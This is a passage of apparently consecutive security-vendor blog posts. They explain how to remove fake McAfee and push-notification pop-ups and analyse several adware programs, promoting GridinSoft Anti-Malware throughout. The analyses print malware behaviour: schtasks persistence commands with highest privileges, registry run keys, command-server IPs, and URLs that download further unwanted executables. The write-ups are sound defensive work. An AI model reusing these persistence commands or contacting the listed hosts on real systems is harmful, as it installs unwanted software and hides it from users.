What Are Fake McAfee Pop-ups?

These aren’t real McAfee alerts. They’re browser notification spam wearing a McAfee disguise. Some website tricked you into allowing notifications. Now they’re flooding you with fake security warnings. The scammers want your money or personal information, similar to tactics used in common online scams.

Click on these notifications and you’ll land on scary websites. “Your computer has 13 viruses!” they scream. They hope you’ll panic and download their junk software. These tactics are identical to other fake virus alert schemes we’ve seen.

Sometimes these scams redirect to real McAfee pages. That doesn’t make them legit. They’re affiliate marketers using dirty tricks. They get paid when you buy something. Similar deceptive methods appear in tech support scams targeting users worldwide.

Could It Be Real McAfee Software?

Rarely. Real McAfee notifications come from official domains. They show up in your system tray, not as browser pop-ups. If you never installed McAfee but see these alerts, they’re definitely fake. This mirrors how Norton subscription scams target people who don’t use Norton.

Manual Removal Steps

You can stop these fake McAfee pop-ups yourself. The key is finding where they come from and cutting off their access. Most come through browser notifications or malicious extensions. These manual methods are effective against various browser notification spam techniques.

Step 1: Remove Notification Permissions in Chrome

Chrome’s notification system is the main culprit. You need to revoke permissions from suspicious websites.

1. Open Chrome and click the three dots in the top-right corner
2. Select “Settings” then go to “Privacy and security”
3. Click “Site Settings” then find “Notifications”
4. Look through the list of allowed websites
5. Remove any suspicious domains like “soft-protect.info” or sites you don’t recognize

You can also type “chrome://settings/content/notifications” in your address bar for quick access.

Step 2: Check for Malicious Browser Extensions

Fake McAfee extensions might be causing these pop-ups. Check your installed extensions and remove anything suspicious.

1. Click the three dots menu in Chrome
2. Go to “More Tools” then “Extensions”
3. Look for any McAfee-related extensions you didn’t install
4. Remove extensions with suspicious names or recent install dates
5. Restart Chrome after removing extensions

Step 3: Clear Browser Data

Clear your browsing data to remove any lingering notification permissions or cached malicious content. This step helps eliminate traces of phishing attempts and malicious website interactions.

1. Press Ctrl+Shift+Delete in Chrome
2. Select “All time” from the time range dropdown
3. Check “Cookies and other site data” and “Cached images and files”
4. Click “Clear data”
5. Restart your browser

Step 4: Check Windows Startup Programs

Some fake McAfee pop-ups come from programs that start with Windows. Check your startup programs for anything suspicious. Malicious software often uses Windows startup processes to maintain persistence.

1. Press Ctrl+Shift+Esc to open Task Manager
2. Click the “Startup” tab
3. Look for programs with names like “McAfee” that you didn’t install
4. Right-click suspicious programs and select “Disable”
5. Research unknown programs before disabling them

Step 5: Scan for Potentially Unwanted Programs

Check your installed programs list for anything you didn’t install. Look especially for programs installed recently.

1. Open Windows Settings (Windows key + I)
2. Go to “Apps” then “Apps & features”
3. Sort by “Install date” to see recent installations
4. Uninstall any suspicious programs or fake security software
5. Be careful not to uninstall legitimate programs

Pay attention to programs that might be potentially unwanted applications bundled with other software.

Browser Cleanup

If manual steps didn’t work completely, use these comprehensive browser cleanup methods. Browser cleanup is essential when dealing with social media malware and similar persistent threats.

Remove Malicious Browser Extensions

Reset Your Browser Settings

If fake McAfee pop-ups persist, reset your browser to default settings:

Automatic Removal with GridinSoft Anti-Malware

Manual removal can be time-consuming and tricky. For faster, more reliable results, GridinSoft Anti-Malware offers automatic detection and removal of fake McAfee pop-ups and related threats. Professional anti-malware software finds hidden components you might miss.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Understanding the Broader Scam Network

Fake McAfee pop-ups are part of a larger scam ecosystem. Criminals use these alerts as gateways to more elaborate schemes. They might lead to Microsoft account locked scams or phantom hacker scams targeting vulnerable users.

The notification spam technique isn’t unique to McAfee impersonation. Similar methods promote fake CAPTCHA sites, cryptocurrency recovery services, and various fraudulent schemes. These tactics are also common in QR code phishing attacks and cryptocurrency giveaway scams.

Prevention Tips

Stop fake McAfee pop-ups before they start with these simple prevention strategies.

Be extra careful about websites using urgent language or claiming immediate action is required. These are common tactics in verification scams designed to bypass your critical thinking. Watch out for fake error message scams that use similar psychological pressure.

If you need real security software, research your options carefully. Don’t respond to scary pop-ups. Legitimate companies like Windows Defender don’t use aggressive pop-up tactics.

Frequently Asked Questions

How can I tell if a McAfee pop-up is fake?

Check the website domain in your browser’s address bar. Real McAfee notifications come from official McAfee domains (mcafee.com). Fake alerts often come from suspicious domains like “soft-protect.info” or other unrelated websites. Real McAfee software notifications typically appear in your system tray, not as browser pop-ups.

Why do I get McAfee pop-ups if I don’t have McAfee installed?

These are fake notifications from websites that got permission to send you browser notifications. Scammers use McAfee’s name recognition to make their fake alerts seem legitimate. The pop-ups aren’t from McAfee software but from malicious websites abusing browser notification permissions.

Can clicking fake McAfee pop-ups harm my computer?

Yes, clicking fake McAfee pop-ups can lead to malware installation, unwanted software downloads, or redirect you to phishing sites designed to steal personal information. These pop-ups often promote fake antivirus software or lead to scams that can result in financial loss and system compromise.

How do I permanently stop all McAfee pop-ups?

For fake pop-ups: Clear your browser’s notification permissions by going to Settings > Privacy and Security > Site Settings > Notifications, then remove suspicious domains. For legitimate McAfee software: Open your McAfee program, go to Settings, and adjust notification preferences to reduce or disable alerts.

What should I do if I already clicked on a fake McAfee pop-up?

Don’t panic, but take immediate action. Close the browser tab, run a full system scan with reputable antivirus software, check for recently installed suspicious programs, and monitor your accounts for unusual activity. If you provided personal information, consider changing passwords and monitoring your financial accounts.

Are there legitimate McAfee renewal notifications?

Yes, but legitimate renewal notifications typically come via email to your registered account or appear within the actual McAfee software interface. They won’t appear as random browser pop-ups from unknown websites. Always verify renewal notices by logging into your McAfee account directly through their official website.

How can I report fake McAfee pop-ups?

You can report fake McAfee notifications to McAfee directly through their official website, report the malicious domains to your browser’s security team (Chrome, Firefox, etc.), and consider reporting to the Federal Trade Commission (FTC) if you’re in the United States. This helps protect other users from similar scams.

Why do fake McAfee pop-ups keep coming back?

Persistent fake pop-ups usually indicate deeper system infection or incomplete removal. You might have bundled software or browser hijackers that need specialized removal tools. Try the manual steps above or use professional anti-malware software for thorough cleanup.

Bottom Line

Most McAfee pop-ups aren’t from McAfee at all. They’re from scammers using fake browser notifications to trick you. By removing notification permissions and checking for malicious extensions, you can stop these annoying alerts for good.

Remember that legitimate security companies don’t use scary pop-up tactics. If you need real antivirus protection, research your options instead of responding to pushy alerts. For additional protection against online threats, learn about social media scams, delivery scam texts, and seasonal shopping scams to stay informed about evolving threat landscapes.

The post How to Stop Fake McAfee Pop-ups from Windows (For Real) appeared first on Gridinsoft Blog.

Sec-tl Pop-Up Notifications Overview

Push notifications from the Sec-tl series of websites is a fraudulent campaign that aims at earning money through pay-per-view ads. Con actors who stand behind it set these sites to send dozens of notifications each minute, each containing some promotion. It works by abusing legitimate browser functionality of push notifications, and the user is tricked into allowing these sites.

Typically, when users get to any of Sec-tl sites, they see a demand “to prove that you are not a robot”. To do this, the site asks to enable notifications. This, eventually, is where it all starts. You can open such a page dozens of times, and that will not impact you or your system unless you press the “Allow” button.

Domains involved in the scam

But let’s get one step backwards, to the way one can get to these websites. Similar to quite a few other similar scam campaigns, these sites gain visitors through redirections from other sites. I am not talking about regular external links – no, frauds rely on random redirects that happen as you click on any website element.

As far as my research shows, Sec-tl sites mainly get redirects from sites that offer pirated movies and TV series. In particular, there are two sites to stay away from – moviesnation[.]org and moviesearch[.]org.

By just going to the root domain, you will see either a 404 error or a hosting boilerplate message saying that the domain is for sale. All the fraudulent activity happens on a much deeper level, with several URL parameters generated during the redirect. And, as you can see from the list above, frauds use quite a few domains, meaning that each can target different countries or show different ads in notifications.

Are Sec-tl Push Notifications Dangerous?

Yes, they are. Aside from being just annoying, as any excessive advertising is, their contents are not filtered in any way. What’s more, scammers apparently cooperate with other frauds in that matter, so quite a lot of push notifications lead to a downloading page of some sketchy software, a shopping scam site, or else. There can also be promotions of gambling or betting sites, or low-trust dating platforms. All of the latter pose less danger than phishing or scams but can create headaches nonetheless.

It is also worth saying that these pop-ups pose no threat unless you click them, and consequently interact with the contents of the site. And it is tricky at times: images in notifications can contain a “cross”, suggesting you to click it to close the ad. Instead, as you had in fact clicked the main content of this promotion, this will throw you to a promoted website.

As for direct dangers for the system, they are not too high unless you have interacted with the ads. However, there are a lot of cases when an active adware was opening such notification spam pages, so the user should not even go to some dodgy websites to trigger a redirect. That’s why an anti-malware scan is a recommended step even after the manual removal of the pop-ups.

How to remove Sec-tl pop-up spam?

Since the main source of pop-ups is the permission to send notifications for a certain website, it is possible to remove it manually. To do this, go to your browser settings and type “Notification settings” in the search bar. I will show this on the example of Google Chrome, but the steps should be similar for the rest of browsers.

Disabling browser pop-ups (scroll images)

Then, it is time for the second step – anti-malware scan. As I said, there is a risk of unwanted pop-ups appearing as the result of adware activity. Removing it manually is a much, much more complicated task than removing permissions for notifications, so an automated scan will be more convenient. For this purpose, I recommend GridinSoft Anti-Malware.

Sec-tl Removal Guide

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Sec-tl Pop-Up Virus appeared first on Gridinsoft Blog.

First-tl Pop-Up Notifications Overview

Push notifications from First-tl series of websites is a fraudulent campaign that aims at earning money through pay-per-view ads. Con actors who stand behind it set these sites to send dozens of notifications each minute, each containing some promotion. It works by abusing legitimate browser functionality of push notifications, and the user is tricked into allowing these sites.

Typically, when users get to any of First-tl sites, they see a demand “to prove that you are not a robot”. To do this, the site asks to enable notifications. This, eventually, is where it all starts. You can open such a page literally dozens of times, and that will have no impact on you or your system unless you press the “Allow” button.

Domains involved in the scam

But let’s get one step backwards, to the way one can get to these websites. Similar to quite a few other similar scam campaigns, these sites gain visitors through redirections from other sites. I am not talking about regular external links – no, frauds rely on random redirects that happen as you click on any website element.

As far as my research shows, First-tl sites mainly get redirects from sites that offer pirated movies and TV series. In particular, there are two sites to stay away from – moviesnation[.]org and moviesearch[.]org.

By just going to the root domain, you will see either a 404 error or a hosting boilerplate message saying that the domain is for sale. All the fraudulent activity happens on a much deeper level, with several URL parameters generated during the redirect. And, as you can see from the list above, frauds use quite a few domains, meaning that each can target different countries or show different ads in notifications.

Are First-tl Push Notifications Dangerous?

Yes, they are. Aside from being just annoying, as any excessive advertising is, their contents are not filtered in any way. What’s more, scammers apparently cooperate with other frauds in that matter, so quite a lot of push notifications lead to a downloading page of some sketchy software, a shopping scam site, or else. There can also be promotions of gambling or betting sites, or low-trust dating platforms. All of the latter pose less danger than phishing or scams but can create headaches nonetheless.

It is also worth saying that these pop-ups pose no threat unless you click them, and consequently interact with the contents of the site. And it is tricky at times: images in notifications can contain a “cross”, suggesting you to click it to close the ad. Instead, as you had in fact clicked the main content of this promotion, this will throw you to a promoted website.

As for direct dangers for the system, they are not too high unless you have interacted with the ads. However, there are a lot of cases when an active adware was opening such notification spam pages, so the user should not even go to some dodgy websites to trigger a redirect. That’s why an anti-malware scan is a recommended step even after the manual removal of the pop-ups.

How to remove First-tl pop-up spam?

Since the main source of pop-ups is the permission to send notifications for a certain website, it is possible to remove it manually. To do this, go to your browser settings and type “Notification settings” in the search bar. I will show this on the example of Google Chrome, but the steps should be similar for the rest of browsers.

Disabling browser pop-ups (scroll images)

Then, it is time for the second step – anti-malware scan. As I said, there is a risk of unwanted pop-ups appearing as the result of adware activity. Removing it manually is a much, much more complicated task than removing permissions for notifications, so an automated scan will be more convenient. For this purpose, I recommend GridinSoft Anti-Malware.

First-tl Removal Guide

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post First-tl Pop-Up Virus appeared first on Gridinsoft Blog.

What are check-tl-version pop-up notifications?

Pop-up notifications from Check-tl-version sites are a spam campaign that aims to earn money from pay-per-view and pay-per-click advertisements. There is an entire chain of such sites, created by the same group of cybercriminals and existing for the same purpose. Frauds who stand behind all this lure people into pressing the “Allow notifications” button that appears as soon as one enters the site. This demand may be framed as a form of captcha, DDoS protection, or the like.

List of domains involved in a scam

One particular source of the redirections to check-tl-version sites is by browsing sites with illegal or explicit content. Websites that host pirated movies or games, adult sites – clicking anything on such pages may trigger the redirection to the scam site that will ask you to allow notifications. That twisted form of cooperation is what makes me warn people against using such sources of software and movies.

Interesting thing about the pop-up spam sites is that they work only after the redirection. Simple checks show that opening the scam page requires a correct link. Visiting the root domain, without the additional parameters in the URL, will return either a 404 error or a boilerplate that says the URL is for sale.

How dangerous are Check-tl-version pop-ups?

Once the user allows notifications from one of the check-tl-version websites, it starts bombarding them with pop-ups. These notifications appear in the system tray, offering gambling, adult sites, or trying to scare the user by saying the system is infected. Clicking on a pop-up will send the user to a website with some rather questionable content. It is also pretty common to see phishing pages promoting in such a way, which forms the main concern of having this pop-up spam.

Another angle of the problem is the offer to install some questionable software to solve non-existent problems. You might encounter a so-called Microsoft tech support scam page or a site that pretends to scan your PC, falsely reporting that there are hundreds of malicious programs running at the moment. To make it harder for the user to quit, scammers make these sites open in a full-screen mode, so there is no visible way out. Of course, unless someone presses the Escape button.

But scams and phishing aside, the key issue with all this is the fact that constant pop-ups are extremely annoying. Because of the way Windows shows notifications, they will appear on top of any app that is currently running. It’s simply hard to concentrate on your task when you constantly hear and see banners popping up one after another. And, well, it will be quite an embarrassing moment when your boss walks by while there is a pop-up with hot girls around you on the screen.

How to remove Check-tl-version pop-ups?

It is possible to remove the pop-up source manually, through the browser interface. For this, go to your browser settings, find notification settings and remove all the sites that are listed as ones that can send notifications. Reload the browser to apply the changes.

Disabling browser pop-ups (scroll images)

There is also the second step – malware removal. It is possible that the check-tl-version pop-ups appearance is caused by the activity of adware or browser hijackers. These two malware types often cause redirections, and may alter web browser settings to their needs. For that reason, I recommend scanning the system with GridinSoft Anti-Malware: it will clear whether there is something malicious on your device, or not. Download it, install and run a Standard scan: this will check the places where the said malware typically keeps its files.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Check-tl-ver Pop-Up Virus appeared first on Gridinsoft Blog.

Movidown Overview

Movidown is a potentially unwanted program (PUA) that markets itself as a utility for controlling fan speeds. But when something gets 54/74 detections on VirusTotal, you know there’s more to the story. In reality, this utility has a darker side – it primarily functions as a loader for browser hijackers and adware. Movidown typically gets into the computer without the user’s explicit consent, often through deceptive methods like installers with hidden add-ons, misleading ads, or links on dubious websites.

Once installed, Movidown does more than adjust fan speeds as advertised. It collects basic system information (fingerprinting) and alters browser settings. While it isn’t a virus in the traditional sense, it may and will disrupt the browsing experience and create phishing risks. Among other things, it can lead to frequent redirects to dangerous or malicious sites, and even phishing pages. They, in turn, may attempt to steal personal information or trick the user into downloading actual malware.

Technical Analysis

Let’s have a closer look on how Movidown behaves on a compromised system to better understand its nature. As mentioned earlier, it is a utility for controlling fan speeds, so some of its actions within the system might seem logical. For instance, the first thing it does after launching is check the system’s hardware for signs of a virtual environment. Malicious programs often do this check, though it is also normal for hardware management utilities. Movidown checks the following system locations:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones\Pacific Standard Time
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ProgramFilesDir

This isn’t an exhaustive list, but such checks can serve both legitimate and malicious purposes. The utility’s need for low-level access to hardware justifies these actions. Though further checks are more concerning, as the utility checks Microsoft Defender settings.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll

Payload Delivery

Unlike a typical dropper malware, this unwanted app follows a slightly different scenario. Normally, a dropper connects to a command server, fetches the current configuration, and then downloads the payload. Movidown virus, in turn, does so immediately upon activation. It appears to have a configuration file embedded into the structure, so all the malicious actions happen without additional steps. It loads a couple of randomly-named files to different folders, including C:\ProgramData – a directory that is hidden by default.

C:\ProgramData\jewkkwnf\jewkkwnf.exe
%SAMPLEPATH%\66b9e7f54cf7b_pro.exe

In this case, ExtreamFanV6.exe is the utility itself, while jewkkwnf.exe is the unwanted software, which functions as a browser hijacker with adware components. Although it’s not fully-fledged malware, technically, Movidown can deliver any type of malicious software.

Establishing Persistence

The next step involves the unwanted software establishing persistence for itself and the payload it have downloaded. For that purpose, it adds itself to the startup processes using Task Scheduler. It also places copies of its files to several directories across the disk.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV6
schtasks /create /f /RU "" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
schtasks /create /f /RU "" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf LG" /sc ONLOGON /rl HIGHEST
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNNT.lnk

The first registry key adds the utility to startup, while the second and third tasks ensure the payload is activated every time the system starts and every hour, with the highest privileges. It’s important to note that while the utility is capable of reading keyboard input, this functionality isn’t inherently malicious — it’s necessary for the operation of “hotkeys”.

C2 Connection

During execution, Movidown communicates with several command servers and tries to get what appears to be certificates. While being a legitimate purpose, this may also be the way to provide deployed malware with a certificate, so it will stay under the radar of security software.

TCP 204.79.197.203:443
TCP 77.105.164.24:50505
TCP 23.59.198.43:443
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200

It’s also worth noting that this unwanted app contacts a server at 77.105.164.24, which is based in Russia. Software itself and any information about it on the Web says nothing about it, so it is worth keeping in mind.

How to Remove Movidown

Removing the Movidown utility itself is straightforward—you can uninstall it using the standard Windows “Installed apps” menu. However, the unwanted software it installs alongside itself can be more challenging to remove. I recommend using GridinSoft Anti-Malware, as this solution will allow you to remove Movidown in just a few clicks. It will also provide long-term protection against any kind of malicious software, and also from network threats. ВеTo remove this unwanted software, follow the instructions below:

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Movidown Unwanted Application appeared first on Gridinsoft Blog.

It is often disguised as legitimate cracked software, driver finder, or tweaker. This malware can also steal some information.

PUA:Win32/Presenoker Overview

PUA:Win32/Presenoker is adware designed to generate revenue through intrusive advertisements. In addition to malvertising, it can steal users’ data, including search history, cookies, and other sensitive information. Although it collects basic system information, it is only about fingerprinting the system; it does not touch passwords or session tokens. Almost all instances of this malware are connected to websites that redirect users to advertising pages. While some pages it advertises are legitimate, others are questionable, significantly degrading the user experience.

PUA:Win32/Presenoker often spreads under the guise of cracked legitimate software, tricking users and infiltrating their devices without their consent. The malware also masquerades as a laptop driver finder or tweaker. However, almost anything downloaded that is not from an official website can lead to Presenoker infection.

Presenoker Technical Analysis

Let’s break down its behavior based on the PUA:Win32/Presenoker sample analysis. As I said above, malware infiltrates the system under the guise of legitimate software. In our case, it is a free but Windows kernel research tool.

Once on the system, malware seeks persistence. To do so, it performs standard actions—it creates driver files, adds appropriate registry entries, and obtains the necessary permissions. Among the latter is the ability to modify the kernel to execute programs at system startup.

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bajejyicthbeby.sys
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\bhrzxcfdwsfytp.sys
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot\Minimal\boalxrinybzftbduk.sys

The malware created multiple registry entries for each file to ensure its drivers and services were loaded in “Minimal Safe Mode”, a diagnostic mode of Windows with only essential functions.

C2 Communication

Presenoker takes multiple HTTP requests made to various URLs, including ww1.epoolsoft[.]com and www.epoolsoft[.]com, suggesting communication with a command-and-control (C2) server. TCP connections are established to several IP addresses on ports 80 and 443, indicating potential communication with external servers.

TCP 63.143.32.86:80
TCP 64.190.63.136:80
UDP a83f:8110:0:0:6076:c7a:e801:0:53

The malware probably receives adverts through some channels (opening some of these addresses redirects to the advertised websites).

Presenoker Advertising

As I said before, the primary purpose of this kind of application is advertising. Usually, these ads often promote online scams, unreliable or hazardous software, and malware. When clicked on, some ads can execute scripts to install or download software without the user’s consent.

A promoted web site that epoolsoft.com redirects to.

A promoted web site that epoolsoft.com redirects to.

A promoted web site that epoolsoft.com redirects to.

In rare cases, users will see what looks like a legitimate internet search website like Yahoo or Bing, but with changed results. The URLs below are the intermediary sites that appear in the URL bar during this redirection. It looks like they gather the information about the search queries and God knows what else.

hxxp://www.epoolsoft[.]com/PCHunter_StandardV1.56=DE8D8650A2322F6FBD61DC24EA6CE9703EDC1C1ABBA4523E236D3DE26CFD2B49C08503DEEA5AEDF515739967BDA959FD
hxxp://ww1.epoolsoft[.]com/?sub1=39aa0efd-0311-11ef-af09-729c7805264a
hxxp://www.epoolsoft[.]com/pchunter/pchunter_free

This website contains links that, when clicked on, will redirect you using adsensecustomsearchads.com

Defense Evasion

Malware may use IsDebuggerPresent and SetWindowsHookExW to evade detection and employ hooking techniques. The PE file has a section (not .text) that is highly probable to contain compressed code using a zlib compression ratio of less than 0.011. It also checks for debuggers, including window names and unique Hardware/Firmware, and can detect virtual machines. Moreover, it may use evasive loops to hinder dynamic analysis and check whether the current process is under debugging.

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

As the name says, these keys contain BIOS information. That is enough data to understand whether the system is a virtual machine or some other modified environment.

How To Remove PUA:Win32/Presenoker?

To remove PUA:Win32/Presenoker you need to use a powerful antimalware solution. GridinSoft Anti-Malware will be an excellent choice to clean your system from unwanted software. In addition to cleaning, this solution will prevent future infections on your device.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post What is PUA:Win32/Presenoker? appeared first on Gridinsoft Blog.

Advanced Window Manager Overview

Advanced Window Manager is an unwanted adware-like program. Despite positioning itself as a useful utility, its primary purpose is to bombard users with advertisements. The program frequently promotes fraudulent or malicious content, posing significant security risks. Clicking on any promotions displayed by Advanced Window Manager may redirect users to malicious websites that automatically download additional potentially unwanted software.

Another undeclared feature is collecting information about users’ internet activity. This data includes search queries, visited URLs, geolocation data, and IP addresses, which are then sold to third parties. Advanced Window Manager is typically distributed as bundled software alongside other programs. Since this software is not particularly stealthy, users can identify its processes in Task Manager.

Detailed Analysis

Let’s analyze how Advanced Window Manager behaves in the system to understand its true nature. It arrives through an installer that precedes the original program and performs basic system checks. During installation, the unwanted software extracts the following files to a temporary folder on the system:

C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\libcurlpp.dll
C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\libstdc++-6.dll
C:\Users\Admin\AppData\Local\Temp\7zS4E1438CD\libcurl.dll

It also resets some files, including:

%WINDIR%\Microsoft.NET\Framework\v4.0.30319\clr.dll
%WINDIR%\System32\rundll32.exe
C:\Users\<USER>\AppData\Local\Temp\7zSC8C4B203\metina_5.exe
C:\Users\<USER>\AppData\Local\Temp\7zSC8C4B203\metina_6.exe

Installation

Once installed, Advanced Window Manager (sample on VirusTotal) begins performing its main task – flooding the system with advertisements. It checks the following registry values, which are responsible for regionalizing the system to install more “relevant” programs:

\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM\Ime File
\Registry\Machine\Software\Policies\Microsoft\System\DNSclient

After completing this check, the malware connects to its command and control server. In our analysis, one of the requests following the initial connection installed an unwanted program called Ultra Media Burner. This behavior likely depends on the results of the aforementioned geolocation check.

GET http://limesfile.com
GET http://limesfile.com/Ea42LhC7KVL6GEpzgxwW/C_Net_8Rpjkd5GEqRYJq87/UltraMediaBurner.exe
GET http://estrix.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139

Additional Checks & Persistence

As a typical adware specimen, Advanced Window Manager performs a series of system checks to determine the system’s location. By examining various registry keys, the malware obtains networking information. It is unlikely to implement any geofencing restrictions, as this data is primarily used to target advertisements more effectively.

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Dnscache\InterfaceSpecificParameters\
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsPolicyConfig

Subsequently, the malicious program modifies another set of registry keys related to Windows services and drivers. This is how it establishes persistence, adding values that associate its files with specific drivers and services in the system.

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MpKsl9a97d018\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\MpKslcbc6775c\Parameters

Advertising, Search Redirects and Browser Hijacking

After completing all preparations, Advanced Window Manager functions as adware or a browser hijacker. The most common scenario after installing this type of software is browser hijacking. The PUP changes the homepage and default search engine to ones it promotes (usually Bing or Yahoo). Users may also encounter lesser-known search engines like Chromstera set as the homepage or default search engine. In such cases, all queries are routed through these services, and the forced search engine change remains effective until the browser is restarted.

In addition to displaying irrelevant search results, the adware fills pages with advertisements and pop-ups, making web browsing extremely difficult. Another aspect of browser hijackers is collecting telemetry about users. Although such software typically does not steal passwords or other sensitive information, it redirects all search queries through its servers, thereby collecting general analytics about user behavior.

How To Remove Advanced Window Manager?

To remove Advanced Window Manager completely from your system, you’ll need to perform several steps. We recommend using specialized anti-malware software for the most thorough cleanup, but we’ve also included manual removal steps below.

Automated Removal with GridinSoft Anti-Malware

Using anti-malware software is the most reliable way to remove Advanced Window Manager and all its components. We recommend GridinSoft Anti-Malware for this task.

Step 1: Download and Install GridinSoft Anti-Malware

First, download GridinSoft Anti-Malware using the button below. Close all browsers before starting the installation process.

Step 2: Run a Full System Scan

Launch GridinSoft Anti-Malware and click on the “Scan” button to begin a comprehensive system scan. This will detect Advanced Window Manager and any other potentially unwanted applications on your system.

Step 3: Remove Detected Threats

After the scan completes, you’ll see a list of detected threats, including Advanced Window Manager components. Select all items and click the “Clean Now” button to remove them.

Step 4: Reset Your Browsers

To completely remove any browser modifications made by Advanced Window Manager, you should reset your browsers to their default settings. In GridinSoft Anti-Malware:

1. Go to the “Tools” tab
2. Select “Reset Browser Settings”
3. Choose the browsers you want to reset
4. Click “Reset” to restore default settings

Step 5: Enable Real-Time Protection

To prevent future infections, enable the Internet Security module in GridinSoft Anti-Malware:

1. Go to the “Protect” tab
2. Check the “Internet Security” option
3. Click “Apply” to save changes

Manual Removal Instructions

If you prefer to remove Advanced Window Manager manually, follow these steps. However, note that manual removal is more complex and may not eliminate all components.

Step 1: Uninstall Advanced Window Manager from Control Panel

1. Press Win + R, type “control panel” and press Enter
2. Go to “Programs” > “Uninstall a program”
3. Find “Advanced Window Manager” or any suspicious recently installed programs
4. Right-click on them and select “Uninstall”

Step 2: Remove the Malicious Scheduled Tasks

1. Press Win + R, type “taskschd.msc” and press Enter
2. Look for tasks containing “Advanced Window Manager,” “AWM,” or suspicious random names
3. Right-click on them and select “Delete”

Step 3: Reset Your Browsers

For Google Chrome:

1. Open Chrome and click the three dots in the top-right corner
2. Go to “Settings” > “Advanced” > “Reset and clean up”
3. Click “Restore settings to their original defaults”
4. Click “Reset settings” to confirm

For Mozilla Firefox:

1. Open Firefox and click the three lines in the top-right corner
2. Go to “Help” > “More troubleshooting information”
3. Click “Refresh Firefox” in the top-right corner
4. Click “Refresh Firefox” to confirm

For Microsoft Edge:

1. Open Edge and click the three dots in the top-right corner
2. Go to “Settings” > “Reset settings”
3. Click “Restore settings to their default values”
4. Click “Reset” to confirm

Frequently Asked Questions

Is Advanced Window Manager a virus?

